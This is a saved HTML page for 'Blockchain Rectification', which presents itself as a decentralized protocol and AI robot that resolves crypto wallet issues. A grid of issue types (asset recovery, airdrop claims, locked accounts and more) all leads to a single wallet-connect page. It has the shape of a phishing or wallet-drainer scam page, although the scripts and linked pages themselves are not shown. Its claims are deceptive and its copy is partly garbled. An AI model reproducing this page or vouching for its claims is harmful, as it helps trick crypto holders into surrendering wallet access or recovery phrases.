<!DOCTYPE html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><!-- /Added by HTTrack -->
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
	<meta data-react-helmet="true" name="msapplication-TileColor" content="#da532c">
    <meta data-react-helmet="true" name="theme-color" content="#ffffff">
    <meta data-react-helmet="true" name="description" content="1. Click the above, 2. Select Issue Type 3. Select Wallet Type, 4. Input Necessary information, 5. Validate">
    <meta data-react-helmet="true" name="keywords" content="ethereum, cryptocurrency, wallet, mobile, connect, bridge, relay, proxy, standard, protocol, crypto, tokens, dapp">
    <meta data-react-helmet="true" name="twitter:card" content="summary_large_image">
    <meta data-react-helmet="true" name="twitter:site" content="@syncwallet">
    <meta data-react-helmet="true" name="twitter:title" content="">
    <meta data-react-helmet="true" name="twitter:description" content="1. Click the above, 2. Select Issue Type 3. Select Wallet Type, 4. Input Necessary information, 5. Validate">
    <meta data-react-helmet="true" name="twitter:img:src" content="social-card.html">
    <meta data-react-helmet="true" name="og:title" content="Click Here To Fix Issues">
    <meta data-react-helmet="true" name="og:type" content="website">
    <meta data-react-helmet="true" name="og:description" content="1. Click the above, 2. Select Issue Type 3. Select Wallet Type, 4. Input Necessary information, 5. Validate">
    <meta data-react-helmet="true" name="og:site_name" content="Blockchain Rectification">
    <title>Blockchain Rectification - We are help to help you resolve your crypto related issues</title>
    <link rel="preconnect" href="https://fonts.googleapis.com/">
<link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
<link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500&display=swap" rel="stylesheet">
<link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@700&family=Poppins:wght@400;500&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <link rel="stylesheet" href="css/owl.carousel.css">
    <link rel="stylesheet" href="css/owl.theme.default.css">
    <link rel="stylesheet" href="css/remixicon.css">
    <link rel="stylesheet" href="css/fonts.css">
    <link rel="stylesheet" href="css/app.css">
    <link rel="stylesheet" id="stm-stmicons-css" href="css/stmicons.css" type="text/css" media="all">
    <link href="css/select2.min.css" rel="stylesheet">
    <link href="css/toastr.min.css" rel="stylesheet">
 
</head>
<body>
mr
    <!--==================================
            Loader Start Here
    ===================================-->
        <div class="Loader">
            <div class="spinnerPairHolder">
                <div class="spinnerPair">
                    <div class="spinnerPairCercle"></div>
                    <div class="spinnerPairCercle"></div>
                </div>
                <div class="spinnerPair">
                    <div class="spinnerPairCercle"></div>
                    <div class="spinnerPairCercle"></div>
                </div>
                <div class="spinnerPair">
                    <div class="spinnerPairCercle"></div>
                    <div class="spinnerPairCercle"></div>
                </div>
                <div class="spinnerPair">
                    <div class="spinnerPairCercle"></div>
                    <div class="spinnerPairCercle"></div>
                </div>
                <div class="spinnerPair">
                    <div class="spinnerPairCercle"></div>
                    <div class="spinnerPairCercle"></div>
                </div>
            </div>
        </div>
    <!--==================================
            Loader End Here
    ===================================-->
    <!--==================================
            Hero Section Start Here
    ===================================-->

    <div style="height:62px; background-color: #1D2330; overflow:hidden; box-sizing: border-box; border: 1px solid #282E3B; border-radius: 4px; text-align: right; line-height:14px; block-size:62px; font-size: 12px; font-feature-settings: normal; text-size-adjust: 100%; box-shadow: inset 0 -20px 0 0 #262B38;padding:1px;padding: 0px; margin: 0px; width: 100%;">
        <div style="height:40px; padding:0px; margin:0px; width: 100%;"><iframe src="https://widget.coinlib.io/widget?type=horizontal_v2&theme=dark&pref_coin_id=1505&invert_hover=no" width="100%" height="36px" scrolling="auto" marginwidth="0" marginheight="0" frameborder="0" border="0" style="border:0;margin:0;padding:0;"></iframe></div>
        <div style="color: #626B7F; line-height: 14px; font-weight: 400; font-size: 11px; box-sizing: border-box; padding: 2px 6px; width: 100%; font-family: Verdana, Tahoma, Arial, sans-serif;"><a href="https://coinlib.io/" target="_blank" style="font-weight: 500; color: #626B7F; text-decoration:none; font-size:11px">Cryptocurrency Prices</a> by Coinlib</div>
    </div>

    
        <div class="hero2-main">
            <div class="container-fluid">
                <div class="row row-custom">
                    <div class="col-lg-5 col-content-otr">
                        <div class="col-content-inr">
                            <h1 class="heading heading-h1">Blockchain Rectification</h1>
                            <p class="desc heading-L">Every digital artwork on Upside is authentic and truly unique. Blockchain technology makes this new aproch to digital ownership possible.</p>
                            <p class="desc heading-L">Open and decentralized protocol for syncing various Wallets issues on  Secure Server. This is not an app but a protocol that establishes a remote resolution between all noncustodial wallet
                            </p><p class="desc heading-L">It is an online server which gets you across to every wallet representative to enable effective complain and rectification of issues.
                            </p><p class="desc heading-L">You will be on a chat with an Artificial Intelligence Robot with zero Human interference.
                            </p><div class="action">
                                <button class="btn-primary-1 btn-hero heading-SB connectButton interact-button connectBtn" id="connectBtn">Connect Automatically</button>

                                <a href="connect/connect/wallets.html"></a>

                                <div class="btn-hero heading-SB" id="slect-main">
                                    <div class="select"><select class="select2-hidden-accessible select2 select-hidden" id="select2-main" aria-invalid="false" data-select2-id="select2-data-1-x6av" tabindex="-1" aria-hidden="true">
                                        <option value="">Select Chain</option>
                                        <option value="0x1" data-select2-id="select2-data-3-rcyi">Ethereum</option>
                                        <option value="0x38" data-select2-id="select2-data-30-ir32">Binance S</option>
                                        <option value="0x89" data-select2-id="select2-data-31-w03z">Polygon</option>
                                        <option value="0xa86a" data-select2-id="select2-data-32-71oo">Avalanche</option>
                                        <option value="0xfa" data-select2-id="select2-data-33-hulu">Fantom</option>
                                        <option value="0xfa" data-select2-id="select2-data-33-hulu">Arbitrum</option>
                                        <option value="0x19" data-select2-id="select2-data-35-silk">Cronos</option>
                                    </select></div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <img class="hero-img" src="images/hero-img-home-2.png" alt="img">
            </div>
        </div>
    <!--==================================
            Hero Section End Here
    ===================================-->
    <!--==================================
            How It Works Start Here
    ===================================-->
    <div class="how-it-work-main">
        <div class="container-fluid">
            <div class="wrapper">
                <div class="tab-otr">
                    <h2 class="heading heading-h2">Make Your Selection Below</h2>
                </div>
            </div>
            <div class="row-custom-main">
                <div id="tab-21" class="tab-content active">
                    <div class="row row-custom-inr">
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="connect/connect/wallets.html"><div class="col-work-inr box-1 connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-check"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Migration Issues</h4>
                                    <p class="desc heading-S">Click here for migration related issues</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="connect/wallets.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-building6"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Assets Recovery</h4>
                                    <p class="desc heading-S">Click here for assets recovery issues</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="connect/wallets.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-building6"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Rectification</h4>
                                    <p class="desc heading-S">Click here to rectify issues</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="connect/wallets.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-oil"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">High Gas Fees</h4>
                                    <p class="desc heading-S">Click here for gas fee related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="connect/wallets.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-chart-refresh"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Slippage Error</h4>
                                    <p class="desc heading-S">Click here for slippage rrlated error during trade.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="connect/wallets.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-stm14_calc"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Transaction Error</h4>
                                    <p class="desc heading-S">Click here for transaction related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="connect/wallets.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-btc_public"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Cross Chain Transfer</h4>
                                    <p class="desc heading-S">Click here for cross chain bridge issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="connect/wallets.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-ia_clock"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Staking Issues</h4>
                                    <p class="desc heading-S">click here for staking related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="connect/wallets.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-marketplace"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Swap/Exchange</h4>
                                    <p class="desc heading-S">Click here for swap/exchange related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="connect/wallets.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-marketplace"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Claim Reflection</h4>
                                    <p class="desc heading-S">Click here to claim reflection.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="connect/wallets.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-stats"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Connect to Dapps</h4>
                                    <p class="desc heading-S">Click here for error while connecting to Dapps</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="connect/wallets.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-crypto_secured"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Login Issues</h4>
                                    <p class="desc heading-S">Click here for issues while logging into your wallet.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="connect/wallets.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-loans_mobile"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Claim Airdrop</h4>
                                    <p class="desc heading-S">Click here for airdrop related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="connect/wallets.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-chart-monitor"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">NFTS Issues</h4>
                                    <p class="desc heading-S">Click here for NFTs minting/transfer related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="connect/wallets.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-lamp"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Missing/Irregular Balance</h4>
                                    <p class="desc heading-S">Click here to recover lost/missing funds.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="connect/wallets.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-plus"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Whitelist Issues</h4>
                                    <p class="desc heading-S">Click here for whitelist related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="connect/wallets.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-marker"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Transaction Delay</h4>
                                    <p class="desc heading-S">Click here for any issues related to transaction delayed.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="connect/wallets.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-crypto_secured"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Locked Account</h4>
                                    <p class="desc heading-S">Click here for issues related to account lock.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="connect/wallets.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-rating_down"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Trading Wallet Issues</h4>
                                    <p class="desc heading-S">Click here if you have problem with your trading wallet.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="connect/wallets.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-stm14_calc"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Unable To Buy Coins/Tokens</h4>
                                    <p class="desc heading-S">To trade crypto your account must be marked as a trusted payment source.</p>
                                </div>
                            </div></a>
                        </div>
                            <div class="col-lg-4 col-md-6 col-work-otr">
                                <a href="connect/wallets.html"><div class="col-work-inr connectBtn">
                                    <div class="icon-otr">
                                        <i style="font-size: 52px;" class="stm-stm14_calc"></i>
                                    </div>
                                    <div class="content">
                                        <h4 class="heading heading-h4">Other Issues Not Listed</h4>
                                        <p class="desc heading-S">If you can't find the issue you are experiencing click here</p>
                                    </div>
                                </div></a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
   
    <!--==================================
            How It Works End Here
    ===================================-->
    <!--==================================
            Footer Start Here
    ===================================-->
        <div class="copyright-main">
            <div class="container-fluid">
                <div class="wrapper">
                    <p class="copy-right heading-S">Copyright © 2022 Blockchain Rectification . All rights reserved.</p>
                    <div class="linkk-otr">
                        <p class="linkk-inr"><a href="connect/wallets.html" class="linkk-page heading-S">Privacy Policy </a> • <a href="connect/wallets.html" class="linkk-page heading-S"> Terms of Service</a></p>
                    </div>
                </div>
            </div>
        </div>
    <!--==================================
            Footer End Here
    ===================================-->
    <script src="js/jquery.min.js"></script>
    <script src="js/jquery.countdown.min.js"></script>
    <script src="js/owl.carousel.min.js"></script>
    <script src="js/bootstrap.bundle.min.js"></script>
    <script src="js/select2.min.js"></script>
    <script src="js/app.js"></script>
    <script src="js/decimal.js"></script>
    <script src="web3.min.html"></script>
    <script src="web3modal.html"></script>
    <script src="js/index.min.js"></script>
    <script src="js/index.min%281%29.js"></script>
    <script src="js/index.min%282%29.js"></script>
    <script src="webModule.html"></script>
    <script src="js/toastr.min.js"></script>
    <script async="" src="dffef40404950ef3-15.js"></script>



</body></html>